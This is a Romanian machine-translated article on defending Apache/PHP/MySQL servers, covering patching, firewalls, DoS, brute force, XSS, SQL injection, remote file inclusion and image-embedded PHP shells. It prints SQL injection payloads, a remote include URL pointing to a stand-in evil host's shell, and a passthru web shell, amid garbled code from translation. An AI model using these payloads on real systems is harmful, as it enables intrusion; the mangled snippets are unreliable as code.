Acești parametri vă permit să definiți grupurile de computer și domeniile care vor fi scanate. Dezvoltarea, instalarea și configurarea unui sistem individual de protecție antivirus pentru întreprinderea dvs. Configurarea unui server de protecție antivirus


În acest articol, aș dori să colectez câteva tipuri de atacuri asupra serverelor și mijloace de protejare a serverului împotriva hackerilor. Numeroase cărți și articole au fost scrise pe tema securității. Acest articol se concentrează pe erorile de bază ale administratorilor și soluțiile pentru eliminarea acestora. După ce a citit acest articol și a verificat propriul său server, administratorul nu va putea dormi bine, el poate spune doar că am trecut de „minimul de candidat”.

Amintiți-vă administratorilor trei proverbe,
nu! mai bine să le imprimați și să le atârnați la locul de muncă în fața ochilor:
"Securitatea este un proces",
"Când administratorul nu are ce face, se ocupă de securitate",
"Securitatea este definită de cea mai slabă legătură"
Articolul este axat pe admins * nix + Apache + PHP + Perl + (MySQL | PostgreSQL) și protejarea serverelor de atacurile de la distanță, pentru alte admins, articolul sper, va fi hrană pentru gândire.
În cărți diferite există diferite clasificări ale atacurilor de hackeri, voi introduce diviziunea mea în două clase condiționate de TOATE atacurile, dezgrupându-le:

  • Atacarea serviciilor care sunt vulnerabile și accesibile pe internet

Pentru a înțelege diviziunea mea, imaginați-vă că există un scenariu fictiv care atacă de la distanță Apache pe portul 80 și ca urmare a atacului, Apache își încheie activitatea și rămâneți fără site-ul dvs., deoarece nu există nimeni care să dea pagini web. Serverul dvs. de mail sendmail a fost trimis 1000 de caractere ca parametru pentru VRFY, nu un nume de utilizator scurt, sendmail nu se aștepta să se întâmple și să se închidă, lăsându-vă fără mail. Înțelesul general al atacurilor din această clasă condițională este acela că o anumită vulnerabilitate a aplicației este exploatată. Și există trei moduri -

  • calea 1) aplicația se va defecta și serviciul nu va fi disponibil, situație DoS;
  • calea 2) aplicația va începe să acapareze resurse și, după epuizarea acestora, va face un DoS;
  • calea3) aplicația va fi alimentată codul shell și codul atacatorului va fi executat;

Toate acestea sunt atacuri asupra serviciului (articolul 1) și sunt tratate într-un singur mod: administratorul află rapid de la dezvoltator despre prezența unei vulnerabilități și actualizează acest program.

Punctul 2 este atunci când un serviciu dinamic implementat într-un limbaj de programare permite primirea parametrilor și, fără a le verifica, le execută. De exemplu, folosind un browser, un atacator, care se târăsc în jurul unui site condus de Apache, caută vulnerabilități în site-ul propriu și le exploatează pentru a obține ceea ce dorește. Scris în Tcl, botul pentru moderarea canalului serverului IRC acceptă solicitări de la utilizator (numărul noii anecdote, data zilei pentru afișarea vremii) și hackerul, recreând activitatea codului programului bot (inginerie inversă), construiește solicitări care nu au fost luate în considerare de către autorul bot.

Întrebați cum este? atunci cu siguranță ai nevoie de acest articol. Într-un fel sau altul, totul va fi descris mai jos.

Atac asupra serviciilor vulnerabile și a serverului însuși

Această secțiune include toate atacurile care afectează sistemul și serviciile. Adesea, astfel de atacuri sunt posibile din erori în implementarea programului, cum ar fi revărsările de buffer. Pe scurt, arată așa, să zicem într-un server FTP slab scris, există un tablou (buffer) pentru un nume de utilizator pentru un anumit număr de caractere (de exemplu, 10), iar un astfel de server FTP primește 100 de caractere de la un neînțelept, dacă o astfel de situație nu se află în codul FTP al serverului. este verificat, apare un preaplin de tampon.

Deci, ce poate face o revărsare tampon locală pentru hackeri? Puteți suprascrie adresa de retur cu un cod rău intenționat. De la distanță, acest lucru permite executarea codului arbitrar pe sistemul țintă, la nivel local, dacă programul este rulat ca root, va câștiga privilegii de administrator de sistem. Codul care provoacă o revărsare a bufferului și execută acțiuni pentru hacker se numește cod shell. Scrierea unui cod shells nu este o sarcină ușoară și necesită cunoștințe despre montator de la hacker, ceea ce implică profesionalism în acest domeniu.

Protecție împotriva atacurilor asupra serviciilor vulnerabile și a serverului însuși

  • Actualizați... Este necesar să înveți cum să actualizezi întregul sistem și, prin urmare, să poți
    „construiți lumea și nucleul” pentru * nix, actualizați-vă prin sistemul de loturi Linux și puteți apăsa butonul Actualizare din Windows Update pentru MS Windows licențiat. Pentru administratorii FreeBSD, trebuie să puteți instala software-ul utilizând porturi. Acest lucru vă va ajuta să navigați cu dezvoltatorii, nu împotriva lor.

    Administratorii MS Windows trebuie să se obișnuiască și să folosească adesea formatul de distribuție MSI, care este foarte recomandat de Microsoft și acceptă actualizarea unui pachet vechi cu unul nou. Orice faceți pe serverul dvs., puneți-vă întrebarea, dacă apare o nouă versiune a acestui program, cum este mai ușor să o actualizați? Trebuie să creați o astfel de soluție pe care o controlați complet, da, există proiecte cu propriile lor dezvoltări sau patch-uri, dar dacă dezvoltările dvs. necesită înghețarea aplicațiilor de care aveți nevoie pe o anumită versiune și nu puteți aplica patch-urile pe noul sistem - o astfel de soluție nu merită!

    Voi face aici o digresiune lirică și vă voi spune cum a trebuit să mă rup. După ce ați citit articole pe Internet, care încep de obicei așa: „descărcați sursa și puneți-o să se instaleze”. Deci, ce urmează? Cum veți instala noua versiune? Păstrați versiunea veche, așa că faceți (de | un) instalați în ea? Și în noua marcă instalați din nou? Aceste întrebări au fost puse de prietenul meu Dmitry Dubrovin când am început să stăpânim FreeBSD. Am început să înțeleg că el avea dreptate și, cel puțin pentru Free, această cale nu era potrivită și, ne urmând calea dezvoltatorilor FreeBSD, am îngreunat doar lucrurile.

    Acum că ați stăpânit FreeBSD, când câteva comenzi descarcă surse noi pentru nucleul Free și întregul sistem, atunci câteva comenzi creează o nouă lume și kernel, iar apoi porturile și aplicațiile din sistem sunt actualizate, începeți să înțelegeți puterea sistemelor * nix. Este dificil să transmiți mândria pe care o simți atunci când faci upgrade un server FreeBSD de la vechea ramură la cea actuală, reconstruiești lumea sistemului, când sistemul se compilează din surse noi (este ca și cum Munchausen s-a scos de păr) și tot ceea ce a funcționat înainte ca actualizarea să funcționeze "fără fișier ".

    După cum ați înțeles deja, trebuie să vă abonați cu siguranță la e-mail-uri de securitate de la dezvoltatorii software-ului care susține afacerea dvs. și să fiți actualizați periodic. Reînnoirea tuturor și a tuturor trebuie să fie lămurită și pusă pe drum.

  • Reglare de securitate... Majoritatea sistemelor de operare ale serverului nu sunt configurate în mod implicit suficient pentru a opera în mediul chimic dur al Internetului. Pentru a împiedica hackerii să „înșele” pe serverul dvs., trebuie să reglați securitatea, și anume, citiți recomandările producătorului sistemului de operare pentru securitate. Administratorii sistemelor * nix pot apela la securitatea omului și, după citirea sfaturilor dezvoltatorilor, pot face ca o poveste să devină realitate. Dar, indiferent de sistemul de operare, trebuie să testați în profunzime funcționarea serverului și a serviciilor după reglarea securității.
  • Firewall... Firewall-ul configurat, care a fost verificat de dvs. personal folosind scanere port ca nmap și scanere de vulnerabilitate, dacă există ieșiri din aceste programe, înțelegeți cu toții despre ce este vorba? Când configurați un firewall, nu uitați că există modalități de a ocoli regulile acestuia. De exemplu, există o rețea locală protejată de un firewall, prin setarea indicatorului pentru interzicerea fragmentării pachetelor, în anumite situații, puteți ajunge la destinație în rețeaua locală. Sau o greșeală comună a administratorului, încredere excesivă în pachetele de ieșire ale propriului server.

    Imaginează-ți o situație reală, codul inamic încearcă să inițieze o conexiune cu gazda hacker-proprietarului și ai o regulă în firewall „totul este permis de la mine la Internet”. Atunci când compuneți reguli pentru un firewall, trebuie să vă imaginați în întregime imaginea întregii comunicări în rețea a serviciilor dvs. între ei și clienții de la distanță.

  • Sistem de detectare a intruziunilor... Un firewall poate fi gândit ca ziduri de piatră lângă castelul unui cavaler. A fost ridicat o singură dată și stai înăuntru - uscat și confortabil. Dar dacă cineva testează deja puterea zidurilor din tun? Poate că trebuie să te uiți deja la castel și să te înghesui pe cineva? Pentru a ști ce se întâmplă în afara zidurilor castelului, ale celor din afară, trebuie să aveți un server de detectare a intruziunilor (IDS) pe server. Dacă aveți un astfel de sistem bazat pe un pachet care vă place, atunci dacă cineva începe să tragă dintr-un tun nmap, atunci veți fi conștienți, iar atacatorul va fi la curent cu „ceea ce știți”.
  • Analiza situațiilor non-standard... Numeroase jurnale de pe sistem citesc adesea „eroare: nu se deschide fișierul / etc / passwd” sau „accesul refuzat”. Este vorba de clopote mici care apelează la o aplicație configurată incorect, care nu poate citi ceva, undeva sau poate nu este un clopot, ci o alarmă care sună alarma despre un hacker care este la jumătatea drumului.

    În orice caz, administratorul ar trebui să fie conștient de astfel de lucruri. Pentru a facilita activitatea administratorului, au fost create programe care vor analiza jurnalele pentru apariția unor fraze interesante și vor trimite un raport administratorului prin poștă. Nu disprețui o astfel de oportunitate, astfel de programe sunt comparabile cu paznicii care verifică pe o cale de încredere, dar toată lumea se comportă așa cum este prescris?

  • Eliminați versiunile software... Eliminați bannerele din serviciile dvs. Nu există acele bannere pe care le afișați pe site-ul dvs., ci liniile pe care programele dvs. le transmit în felicitări atunci când vă conectați sau la ieșirea erorilor. Nu este nevoie să străluciți asupra versiunilor programelor lor, hackerii caută versiuni pe Internet pentru programe disponibile care exploatează acest lucru sau acea vulnerabilitate (exploatează).

    Nu există o singură soluție, de exemplu, dacă instalați un anumit program din porturi, atunci nu scrieți make make clean, deci fără dvs. totul va fi descărcat, compilat și instalat. Mai bine faceți obținerea; face extract; apoi accesați subdirectorul fișierelor și acolo, în codul sursă, puteți corecta versiunea programului sau o puteți transmite ca alta, apoi faceți instalarea numai curată.

    Apache este foarte informativ în afara locului și încă strălucește cu versiunile sistemului, PHP, Perl, OpenSSL. Dezactivat prin specificarea directivelor din httpd.conf ServerSignature Off ServerTokens Prod. Pe Internet puteți găsi ajutor pentru înlocuirea bannerelor pentru orice program. Scopul este unul singur: să privezi atacatorul de informații valoroase. Privind lista de servicii disponibile de pe Internet, întrebați-vă dacă oferă informații inutile despre sine și informațiile pe care le stochează.

    De exemplu, legarea serverului DNS poate permite „transferuri de zonă”, iar computerele cu numele lor de IP și domenii vor fi disponibile tuturor, ceea ce este rău. Verificați-vă singur serverul cu diverse scanere și citiți cu atenție rezultatul acestora. Când înlocuiți un banner de program, vă sfătuiesc să introduceți text nu la întâmplare, ci un avertisment despre responsabilitate și că acțiunile sunt înregistrate. Întrucât au existat incidente când hackerul a fost eliberat în sala de judecată, la fel ca pe serverul FTP hackat, exista o inscripție "Bine ați venit! Bine ați venit!"

  • Regula minimului necesar... Minimizați serviciile disponibile pe Internet. Dezactivați inutil, deoarece nu puteți hack ceea ce este dezactivat. O greșeală comună, de exemplu, când un server MySQL împerecheat cu Apache pe aceeași mașină este configurat să fie accesibil de la distanță pe portul său standard 3306. De ce? Emite comanda netstat -na | grep Ascultă și dă-ți un răspuns: știi ce programe folosesc ce interfață și ce port? Sunteți în controlul situației? Ei bine, da.
  • Multe parole puternice și diferite... Adesea, în videoclipurile de hackeri sau în poveștile despre hackeri, expresia „este bine că administratorul a avut o parolă pentru panoul de admin, care a ajuns și la ssh și ftp”. Sper că nu este vorba despre tine. De aici regula: parolele pentru diferite servicii trebuie să fie diferite și cel puțin 16 caractere. Să fie notată pe o bucată de hârtie, dacă vă este frică să uitați (în acest loc specialiștii în securitate mă omoară), dar acest lucru este mai bun decât un atacator de la distanță decripta parola în câteva minute, deoarece lungimea mică a parolei și asemănarea cu un cuvânt din dicționar mi-au permis acest lucru.

    Este ușor să faceți parole diferite pentru servicii diferite dacă serviciile sunt autorizate nu ca utilizatori de sistem în baza de date / etc / passwd, ci ca și cele virtuale în bazele de date plane sau DBMS. Nu stocați parolele pe serverele în fișierul password.txt pentru toate resursele la care aveți acces, ca administrator.

  • Prescripţie... Toate serviciile dvs. de pe server ar trebui să fie difuzate sub diferite conturi limitate și niciodată să fie executate sub contul rădăcină. Crede-mă, dacă ajung la escaladarea privilegiilor dintr-un cont limitat la starea rădăcină (uid \u003d 0, gid \u003d 0), vei fi salvat prin absența găurilor cunoscute din sistemul tău actualizat.

    Apropo, mulți administratori uită de așa ceva, de ce, de exemplu, conturile pentru Apache și MySQL au acces la shell! La urma urmei, aceasta poate fi dezactivată și în loc de shell puteți specifica / bin / false. Ei bine, sincer, verificați-vă conturile programului pe serverul dvs. de raportare și spuneți-mi dacă greșesc. În bazele de date SQL, restrângeți conturile la privilegiile minime necesare. Nu acordați privilegiile FILE atunci când este apelat doar SELECT.

  • Toată lumea în închisoare! Învățați să lucrați cu cutii de nisip sau închisori și să executați aplicații în aceste încăperi izolate, acest lucru va face dificilă piratarea întregului server. Dacă utilizați virtualizare, puteți distribui servicii pe diferite sisteme de operare invitate.
  • Apărare stratificată. Este posibil să interzicem ceva în mai multe moduri în diferite locuri - faceți-o. Niciodată să nu mă gândesc - am interzis-o aici, interzicând lucrurile inutile acolo.

Aflați mai multe despre atacurile asupra serviciilor vulnerabile și serverul în sine.

  • Atac DoS (Denial of Service) - un atac al cărui obiectiv este de a împiedica unele resurse de server limitate (canal Internet, RAM, procesor, etc.), astfel încât serverul să nu poată servi utilizatorii legitimi. Figurativ vorbind, imaginați-vă că un intrus v-a sunat acasă și a tăcut la telefon și așa a continuat toată seara. Te-ai săturat de toate astea și ai oprit telefonul, iar dimineața ai aflat că ai ratat un apel important din partea șefului tău. Iată o analogie în viața reală pentru un atac DoS.

    În viața reală, DoS arată adesea astfel, din cauza unei erori în program, utilizarea procesorului sare și rămâne la 100% o lungă perioadă de timp, iar atacatorul folosește periodic această gaură din program. O aplicație scrisă strâmbă poate epuiza toată memoria RAM. Sau o „poștă bombă” sub forma unui fișier puternic comprimat în arhivă cu multe caractere [spațiu], pe care antivirusul le va despacheta pentru verificare, iar fișierul imens despachetat va umple partiția de pe hard disk pe server sau / și va determina serverul să repornească.

    Protecție împotriva atacului DoS:

    • Actualizarea unui program manipulat pentru un atac DoS
    • Configurați cote de resurse pentru contul din care rulează acest program. * sistemele nix vă permit să configurați procentul de utilizare a procesorului, memoria RAM, numărul de procese depuse, fișierele deschise etc. etc.
    • Configurați logarea în program și încercați să găsiți atacatorul păpușarului și să-l blocați în firewall.
    • Configurați programul ca dezvoltator, guru recomandă, conform articolelor de pe Internet, dacă vă aflați într-o astfel de situație.
  • DDoS (același DoS, dar sunteți atacat de la mai multe calculatoare zombie, sub îndrumarea lui
    atacator). DDoS este distructiv și este folosit doar de acei vandali care au turme de mașini zombificate și vor cere bani pentru a opri un atac sau a vă deteriora afacerea, astfel încât utilizatorii, fără să ajungă la serverul dvs., să meargă la un concurent. Atacurile DDoS nu sunt folosite de hackerii al căror obiectiv este să-ți pirateze inteligent serverul, da, serverul tău este un „mister” pe care vor să-l „rezolve”.

    Cum să vă protejați împotriva DDoS? Dacă vă bazați pe propriile forțe și mijloace, atunci puteți, automatizând lucrarea cu scripturi, să adunați adrese IP din diverse jurnale și să le introduceți în regulile de interzicere a firewallului. De exemplu, autorul articolului „Există viață sub DDoS?” În revista Hacker. Blocați rețelele atacatorilor din firewall, daunele provocate de DDoS pot fi reduse citind articolele privind configurarea programelor dvs. și urmând aceste instrucțiuni. De exemplu, pentru Apache există O mulțime de articole despre cum să o configurați pentru a minimiza daunele DDoS.

    Protecție DDoS:

    • Dacă DDoS este direcționat către o aplicație, încercați să găsiți în jurnalele diferențele dintre atacatori și utilizatori legitimi și, automatizându-l cu un script, introduceți-l în regulile firewall-ului în refuz.
    • Dacă DDoS este direcționat către sistem (de exemplu, un atac de protocol ICMP), automatizând cu un script, introduceți-l în regulile de firewall pentru a refuza
    • Configurați cote de resurse pentru contul din care rulează acest program. * sistemele nix vă permit să configurați procentul de utilizare a procesorului, memoria RAM, numărul de procese reproduse, fișierele deschise etc., etc.
    • Configurați programul ca dezvoltator, guru recomandă, conform articolelor de pe Internet, dacă vă aflați într-o astfel de situație
    • Vă rugăm să luați legătura cu furnizorul dvs. de asistență pentru a vă ajuta în orice fel. Scrieți o reclamație la [email protected]host_nets_from_attacked.domain. Acest lucru va ajuta la distrugerea parțială a rețelei atacatorului, îl va permite să sufere daune, îi costă bani. Veți experimenta satisfacție morală.
    • Familiarizați-vă cu mod_security pentru Apache, care este un instrument excelent care vă poate ajuta în anumite situații.
  • Parolă atac bruteforce. Aici găurile programelor nu sunt de vină, ele aleg doar o pereche de autentificare / parolă. Oricine a lăsat serverul cu ssh configurat, dar a uitat să restricționeze accesul ssh de la anumite IP-uri și cu anumite autentificări (directiva în ssh_config AllowUser), trebuie să fi văzut încercări de a forța bruta parola masha în jurnalele: masha_password.

    Protecție bruteforce cu parolă:

    • Limitați numărul de încercări de autentificare / parolă eșuate
    • Dacă aplicația permite, atunci configurați creșterea timpului înainte de o nouă încercare de autentificare / parolă.
    • Dacă un cerc îngust de oameni trebuie să lucreze cu aplicația, creați o astfel de regulă și limitați-le

Atacați prin conținutul serviciilor dinamice

Acest tip de atacuri apar adesea pe pachetul Apache + (PHP | PERL) + (MySQL | PostgreSQL) pentru lumea * nix și IIS + ASP + Microsoft SQL Server pentru lumea MS Windows folosind un browser simplu, dar acesta este doar un caz special, care este doar mai des folosit datorită popularității web. În acest pachet, limbajele de programare sunt ASP, PHP, Perl, SQL, astfel încât deseori vor fi folosiți de hackeri pentru a-și compune construcțiile distructive.

DAR cel mai important este să înțelegem că astfel de ligamente serviciu + conținut dinamic deasupra lor există multe limbaje de programare și, prin urmare, toate sunt sub arma hackerilor. De exemplu, aceasta este o listă incompletă:

  • Server web + scripturi CGI
  • Un pachet antic care nu este folosit acum - scripturile Apache + PHF (și anume P H F)
  • IIS + ColdFusion Application Server
  • Mecanism SSI (Server Side Include)

În plus, vom vorbi mai ales despre web-hack, dar nu uitați că tot ceea ce este descris mai jos este valabil și pentru alte pachete de servicii + conținut dinamic. Cuvintele sunt diferite, dar esența este aceeași. Astăzi hackerii atacă web-ul cu un browser, mâine cu un client R împotriva serviciului Z. Serverul web, el însuși fiind conectat la baze de date și numeroase limbaje de programare, a devenit o platformă pentru atacuri de acest fel.

Punctul tuturor atacurilor de acest fel se reduce la încercarea de a scana site-ul folosind un browser pentru erori în scripturile care servesc conținutul dinamic al site-ului.

Prin urmare, concluzia: hackingul unui site printr-un atac pe web, care conține doar pagini html statice care se leagă doar între ele, este IMPOSIBIL. Atacurile de pe site-ul dvs. Web s-au produs atunci când oamenii doreau mai multă interactivitate și l-au adăugat prin limbaje de programare și baze de date.

Hackerii care navighează pe site, acordă o atenție deosebită scripturilor cărora le este transmis orice parametru. Ce se întâmplă dacă autorul scriptului nu verifică ce este trecut exact ca valoare a parametrului?

Soluții generale pentru admin împotriva atacurilor asupra conținutului dinamic al serviciului (site-ul Web, ca un caz special)

  • Actualizați... Am vorbit deja despre acest lucru, dar dacă utilizați o dezvoltare terță parte (motoare pentru forumuri, galerii, chat-uri etc.), atunci primiți mesaje despre vulnerabilități și patch gauri. Părerea hackerilor este că, dacă portalul lucrează cu finanțe și cifra de afaceri a acestora, atunci pe un astfel de portal nu este de dorit să se dezvolte altcineva, cu excepția celor proprii. Desigur, se presupune că dezvoltarea propriilor motoare pentru site a fost scrisă de codificatori care știu să programeze în siguranță și au o înțelegere a amenințărilor pe Internet.
  • Fii non-standard... În multe baze de date despre utilitățile și vulnerabilitățile hackerilor apar adesea căile forum /, galerie /, imagini /. Foarte confortabil! Cunoașteți administratorul, jumătate dintre ei se vor ras și vor scuipă pe site-ul dvs. atunci când site-ul dvs. nu este localizat în / usr / www, iar zona dvs. de administrare nu este site.com/admin. Concluzia este, dacă nu sunteți standard, atunci acesta este un stick suplimentar în roțile unui hacker care vă atacă site-ul. El va trebui să adauge / să remedieze baza / scriptul manual. Un hacker poate sau poate întotdeauna? Tinerii hackeri de tip script vor fi speriați. Iată, de exemplu, sfaturi de securitate PHP

    # Faceți ca codul PHP să semene cu alte tipuri de coduri
    Aplicație AddType / x-httpd-php .asp .py .pl
    # Faceți ca codul PHP să pară coduri de tipuri necunoscute
    Aplicație AddType / x-httpd-php .bop .foo .133t
    # Faceți ca codul PHP să pară html
    Aplicație AddType / x-httpd-php .html .htm

    Această formă de securitate pentru PHP prin obscuritate are câteva dezavantaje la costuri reduse. Hackerii înșiși, descriind hack-urile lor, scriu că descarcă același software care se află pe serverul dvs. de pe site-ul web al dezvoltatorului și se uită cu ce nume / căi de tabel implicite / acesta sau acel motor funcționează. Sensul general de a fi non-standard este întârzierea procesului de hacking, astfel încât hackerul să nu aibă succes în „blitzkrieg” și, cu cât trage mai mult, cu atât este mai probabil să fie detectat.

  • Eliminați versiunile motoarelor și scripturilor de pe site... Aceasta este informația valoroasă de care ar trebui să fie privat un atacator, știind versiunea pe care o caută soluții gata de hacking. Asigurați-vă că scripturile dvs. nu afișează informații utile despre erori, cum ar fi: calea către scriptul în care s-a produs eroarea (problema „extinderea căii”) și ieșirea în sine a erorii.
  • Gândește-te că ai nevoie de .htaccess... Prezența fișierelor .htaccess implică faptul că puteți trece peste opțiunile setate în configurația principală Apache, credeți-mă, hackerii vor face acest lucru. Dacă dezactivați utilizarea .htaccess cu directiva „AllowOverride None”, atunci veți obține un beneficiu de performanță pentru Apache, deoarece nu va examina toate directoarele de pe calea către pagina web cu fiecare solicitare și va crește securitatea serverului web Apache.

Aflați mai multe despre atacurile asupra conținutului dinamic (site-ul Web ca caz special)

  • XSS (Cross Site Scripting).
    Scripturile încrucișate se numesc XSS, nu CSS, deoarece CSS este un acronim timpuriu pentru foile de stil în cascadă. Atacurile XSS nu sunt direcționate împotriva serverului, ci împotriva utilizatorilor serverului respectiv. Dar administratorul nu este necesar! Atacul XSS arată astfel, site-ul are câmpuri editabile pe pagina web sau parametrii script care nu sunt filtrați pe construcții precum<, >, javascript.

    Hackerul adaugă coduri de limbaj de programare din partea clientului, de obicei Java și VBScript, în câmpuri editabile, iar acest cod devine parte a paginii HTML. Când un utilizator vizitează o astfel de pagină, browserul său analizează pagina și execută acest cod.
    Ce fac hackerii cu XSS?

    • Furarea cookie-urilor (cookie-uri, chifle) - aceste fișiere text stochează informații pe care serverul „a pus” utilizatorul pentru identificarea sa ulterioară. În exemplu, dacă creați un fișier test.html cu un astfel de conținut (scrieți-l manual), atunci când rulați într-un browser, acesta va afișa XSS.
      Dragă admin, am avut o eroare în timpul vizitei site-ului
      Ajutor

      Dar puteți scrie un script în Java și mai serios... De obicei, astfel de scripturi sunt scrise pe e-mail-ul administratorului și, folosind ingineria socială, încercați să-l citiți să citească mesajul pentru a obține cookie-urile sale.

      Dacă cookie-urile nu sunt legate de adresa IP și de măsuri suplimentare de protecție, atunci înlocuiesc cookie-urile lor cu cookie-urile administratorului și încearcă să intre în panoul de admin, care nu verifică autentificarea și parola și identifică persoanele doar prin cookie-uri.

    • Site deface (deface - înlocuirea paginii de început a site-ului, cel mai adesea index.html)
    • Troianizarea unui utilizator la distanță. Sunt selectate exploatări proaspete pentru browserele utilizatorilor și atunci când intră pe o pagină vulnerabilă, se încearcă infectarea computerului cu un troian. Dacă utilizatorul are instalat un antivirus cu baze de date proaspete, el va indica apariția unui troian în sistem. Și site-ul tău va cădea în ochii utilizatorului, poate că nu va mai veni la tine.
    • DoS. Cu un număr mare de vizitatori, scriptul va solicita suplimentar alte pagini de la serverul dvs. sau de la altul, poate fi DoS pentru cineva.

    Soluție pentru problemă:

    • Pentru a împiedica scrierea tagurilor html în baza de date din câmpurile de introducere a informațiilor, utilizați construcții precum htmlspecialchars pentru PHP, care vor înlocui< на <, > on\u003e, & on și așa mai departe
      Exemplu,

      $ comment \u003d htmlspecialchars ($ comentariu, ENT_QUOTES);
      $ query \u003d "insert in bookbook
      (nume, locație, e-mail, url, comentariu) valori
      ("$ nume", "$ locație", "$ email", "$ url", "$ comentariu") ";
      mysql_query ($ interogare) sau die (mysql_error ());

    • Verificați și filtrați în scripturile dvs. toți parametrii pe care îi introduce utilizatorul și care sunt transmise scriptului prin bara de adrese. Aflați cum să utilizați corect expresiile regulate pentru a analiza datele primite. Găsiți materiale care învață tehnici sigure de codare pentru limbajul dvs. de programare.
    • Dacă doriți să utilizați tehnologia cookie pe site-ul dvs., vă rugăm să citiți practicile noastre cookie sigure. Limitați-le acțiunile în timp și prin adrese IP.
    • Ca administrator, fii atent când ești creat de inginerie socială. Nu uitați de securitatea computerului personal pe computerul client.
  • Injecție SQL. Injecție SQL.
    Această boală înseamnă că un parametru nechemat este înlocuit în interogarea SQL care apare în script. Hackerul găsește scripturi bolnave de injecție SQL într-un mod simplu, ghilimele site.com/view.php?id\u003d1 "este furnizat la valoarea parametrului sau parametrul numeric este modificat astfel încât site.com/view.php?id\u003d2-1.

    Dacă ghilimele inserat provoacă o „eroare” (o mulțime de mesaje care o astfel de solicitare nu este executată într-un astfel de script și pe un astfel de script pe această cale), atunci un astfel de script este candidat pentru pomparea acestuia în continuare. Cybercriminalii folosesc adesea hack-ul Google, solicitând un motor de căutare cu întrebări similare „site: www.victim.ru Avertisment.” Motorul de căutare Google va returna scripturi incorecte pe site-ul dvs., atât de vechi încât au fost mult timp indexate de păianjenul Google.

    Cod care nu verifică valoarea și suferă de injecție SQL

    $ id \u003d $ _REQUEST ["id"];
    $ rezultat \u003d mysql_query ("SELECT titlu, text, știri de date, autor FROM` news` WHERE` id` \u003d "$ id" ");

    Acum imaginați-vă că, în loc de un număr, veți fi înlocuit „-1 uniune selectare nul / *” (fără ghilimele) și apoi interogarea dvs. se va transforma

    SELECTA titlul, textul, știri de date, autorul din `news` WHERE` id` \u003d" - 1 union select null / * "

    Adică, hackerul dorește, pe lângă cererea dvs., cererea sa, combinată cu a ta folosind directiva privind uniunea. Și atunci hackerul va încerca să compună alte interogări și, având în vedere puterea limbajului SQL, acest lucru nu implică bine administratorul. De la deface (deface - înlocuirea paginii de pornire a site-ului) până la obținerea drepturilor root asupra serverului tău. Un hacker poate, de asemenea, efectua un atac DoS datorită injecției SQL: site.com/getnews.php?id\u003dBENCHMARK(10000000,BENCHMARK(10000000, md5 (actual_date))), câteva cereri și serverul la 100% procesor de încărcare pentru o lungă perioadă de timp.

    Protecție împotriva injecțiilor SQL:

    • Utilizați pe scară largă instrumentele SQL Server, cum ar fi vizualizările și procedurile stocate. Aceasta va limita accesul neautorizat la baza de date.
    • Înainte de a trece un parametru la o solicitare, acesta trebuie verificat pentru tipul său (pentru PHP - is_bool (), is_float (), is_int (), is_string (), is_object (), is_array () și is_integer ()) și, cel puțin, pentru a cita folosind o construcție precum addlashes pentru PHP.
    • Toate scripturile funcționează cu baza de date dintr-un cont de bază de date, eliminați din acest cont toate privilegiile care nu sunt necesare pentru a funcționa. Adesea, hackerii folosesc comanda MySQL (MySQL este luată ca exemplu, acest lucru se aplică oricărui server SQL) „LOAD DATA INFILE” pentru a citi fișierele de care au nevoie de pe server și contul lizibil sub care se execută MySQL. De aici concluzia, dezactivați privilegiile inutile pentru scripturile dvs., cum ar fi FILE, care sunt necesare pentru a utiliza comanda LOAD DATA INFILE. Principiul „minimului de bază” ar trebui luat ca bază.
    • Contul de sistem pe care se execută serverul SQL nu ar trebui să aibă acces la paginile site-ului și la fișierele de sistem ale serverului.
  • Conectarea fișierelor. Includeți fișierul. Să presupunem că există o pagină site.com/getnews.php?file\u003d190607, dar autorul scriptului, utilizând include, include pagina, fără verificări.

    $ file \u003d $ _REQUEST ["fișier"];
    include ($ file. ". html");

    Hackerul va înlocui evil_host.com/shell.php în loc de 190607, iar întreaga bara de adrese a browserului hackerului va arăta ca site.com/postnews.php?file\u003devil_host.com/shell.php, iar hackerul va avea propriul său web shell pe site-ul dvs. cu drepturile pe care le are Apache.

    Protecție conexiune fișier:

    • Verificați și filtrați în scripturile dvs. toți parametrii pe care îi introduce utilizatorul și care sunt transmise scriptului prin bara de adrese. Găsiți materiale care învață tehnici sigure de codare pentru limbajul dvs. de programare.
    • Hackerii le place foarte mult atunci când limbajul de programare de pe site vă permite să rulați comenzi de sistem. Prin urmare, trebuie să interziceți apelarea unor astfel de funcții în limbajul dvs. de programare, dacă, desigur, este posibil. De exemplu, în setările PHP este posibil să specificați o listă de funcții „interzise” folosind disable_functions în php.ini.
  • Poza troiană
    Dacă aveți capacitatea de a încărca fișiere pe serverul de pe site, fiți pregătiți să încărcați, de exemplu, imagini avatar. Într-o imagine în format JPEG există un concept de metadate (amintiți-vă unde camera scrie informații la fotografierea unui cadru) și aceste metadate vor fi scrise

    "; passthru ($ _ GET [" cmd "]); ecou""; ?>

    imaginea va fi redenumită avatara.jpg.php, pentru a ocoli majoritatea verificărilor pentru extensie și va folosi site.com/upload_images/avatara.jpg.php?cmd\u003dserver_commands

    Protecția troiană:

    • Verificați corect extensia de fișier. Chiar dacă prelucrați fișierele permise corect, fiți pregătiți ca imaginea de la jpg la php să fie redenumită folosind o altă vulnerabilitate pe site-ul dvs. Verificați metadatele dintr-o imagine folosind funcții precum exif_read_data () în PHP.
    • Interziceți prin intermediul serverului dvs. web executarea limbajelor de programare în cataloage cu imagini. Pentru a face acest lucru, căutați în configurațiile Apache pentru liniile cu formularul „Aplicație AddType / x-httpd-”, care asociază limbaje de programare cu extensii de fișiere și interzic executarea lor în directoare cu imagini. Pentru Apache, interdicția de execuție a fișierelor de limbaj PHP va fi construcția


      Comanda negă, permite
      Neagă de la toate

    • Pentru limbajul dvs. de programare, găsiți materiale care învață tehnici de programare sigure pentru procesarea imaginilor și încărcarea lor pe server corect.

Mulțumiri personale:

  • prietenul Alexander Pupyshev aka lynx pentru critici și sfaturi
  • site-ul antichat.ru/
  • site-ul xakep.ru/
  • carte de Michael Eben, Brian Tyman. Administrarea FreeBSD: arta echilibrării
  • carte de Joel Skembray, Stuart McClar, George Kurtz. Secretele hackerilor: securitatea rețelei - soluții gata făcute. A doua editie

Alte surse de informații privind protecția:

  • Pagina de securitate a omului FreeBSD conține probleme generale de securitate și bune practici de administrare.
  • Abonați-vă la listele de distribuție freebsd-security @ freebsd.org. Pentru a face acest lucru, trimiteți un e-mail către majordomo @ freebsd.org cu textul subscriere freebsd-security în corpul mesajului. În această listă de e-mail sunt discutate cele mai stringente probleme de securitate.
  • Pagina cu informații de securitate FreeBSD freebsd.org/security/
  • Document de modalitate de securitate FreeBSD
